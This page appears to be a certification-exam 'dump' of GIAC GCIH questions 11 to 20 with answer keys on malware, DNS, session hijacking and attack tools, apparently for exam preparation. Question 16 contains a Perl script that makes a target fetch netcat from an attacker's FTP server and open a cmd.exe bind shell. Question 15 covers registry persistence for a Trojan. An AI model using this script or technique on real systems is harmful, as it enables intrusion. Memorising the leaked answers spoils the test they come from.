[Free] 2017(Sep) EnsurePass Testinsides GIAC GCIH Dumps with VCE and PDF 11-20

GIAC Certified Incident Handler

Question No: 11 – (Topic 1)

Which of the following statements are true about worms?

Each correct answer represents a complete solution. Choose all that apply.

  1. Worms cause harm to the network by consuming bandwidth, whereas viruses almost always corrupt or modify files on a targeted computer.

  2. Worms can exist inside files such as Word or Excel documents.

  3. One feature of worms is keystroke logging.

  4. Worms replicate themselves from one system to another without using a host file.

Answer: A,B,D

Question No: 12 – (Topic 1)

Which of the following is designed to protect the Internet resolvers (clients) from forged DNS data created by DNS cache poisoning?

  1. Stub resolver

  2. BINDER

  3. Split-horizon DNS

  4. Domain Name System Extension (DNSSEC)

Answer: D

Question No: 13 – (Topic 1)

Which of the following is a network worm that exploits the RPC sub-system vulnerability present in the Microsoft Windows operating system?

  1. Win32/Agent

  2. WMA/TrojanDownloader.GetCodec

  3. Win32/Conficker

  4. Win32/PSW.OnLineGames

Answer: C

Question No: 14 – (Topic 1)

The Klez worm is a mass-mailing worm that exploits a vulnerability to open an executable attachment even in Microsoft Outlook's preview pane. The Klez worm gathers email addresses from the entries of the default Windows Address Book (WAB). Which of the following registry values can be used to identify this worm?

  1. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices

  2. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

  3. HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4\Wab File Name = "file and pathname of the WAB file"

  4. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Answer: C

Question No: 15 – (Topic 1)

You have inserted a Trojan on your friend's computer and you want to put it in the startup so that whenever the computer reboots the Trojan will start to run on the startup. Which of the following registry entries will you edit to accomplish the task?

  1. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Startup

  2. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Auto

  3. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices

  4. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Start

Answer: C

Question No: 16 – (Topic 1)

Adam, a malicious hacker, performs an exploit, which is given below:

    #####################################################
    $port = 53;                     # Spawn cmd.exe on port X
    $your = "192.168.1.1";          # Your FTP Server 89
    $user = "Anonymous";            # login as
    $pass = 'noone@nowhere.com';    # password
    #####################################################
    $host = $ARGV[0];
    print "Starting …\n";
    print "Server will download the file nc.exe from $your FTP server.\n";
    system("perl msadc.pl -h $host -C \"echo open $your >sasfile\"");
    system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");
    system("perl msadc.pl -h $host -C \"echo $pass>>sasfile\"");
    system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");
    system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\"");
    system("perl msadc.pl -h $host -C \"echo get hacked.html>>sasfile\"");
    system("perl msadc.pl -h $host -C \"echo quit>>sasfile\"");
    print "Server is downloading …\n";
    system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\"");
    print "Press ENTER when download is finished … (Have a ftp server)\n";
    $o=<STDIN>;
    print "Opening …\n";
    system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");
    print "Done.\n";
    #system("telnet $host $port");
    exit(0);

Which of the following is the expected result of the above exploit?

  1. Creates a share called "sasfile" on the target system

  2. Creates an FTP server with write permissions enabled

  3. Opens up a SMTP server that requires no username or password

  4. Opens up a telnet listener that requires no username or password

Answer: D

Question No: 17 – (Topic 1)

Which of the following takes control of a session between a server and a client using TELNET, FTP, or any other non-encrypted TCP/IP utility?

  1. Dictionary attack

  2. Session Hijacking

  3. Trojan horse

  4. Social Engineering

Answer: B

Question No: 18 – (Topic 1)

Which of the following statements are true about firewalking?

Each correct answer represents a complete solution. Choose all that apply.

  1. To use firewalking, the attacker needs the IP address of the last known gateway before the firewall and the IP address of a host located behind the firewall.

  2. In this technique, an attacker sends a crafted packet with a TTL value that is set to expire one hop past the firewall.

  3. A malicious attacker can use firewalking to determine the types of ports/protocols that can bypass the firewall.

  4. Firewalking works on the UDP packets.

Answer: A,B,C

Question No: 19 – (Topic 1)

Which of the following tools can be used for stress testing of a Web server?

Each correct answer represents a complete solution. Choose two.

  1. Internet bots

  2. Scripts

  3. Anti-virus software

  4. Spyware

Answer: A,B

Question No: 20 – (Topic 1)

Which of the following tools is an automated tool that is used to implement SQL injections and to retrieve data from Web server databases?

  1. Fragroute

  2. Absinthe

  3. Stick

  4. ADMutate

Answer: B
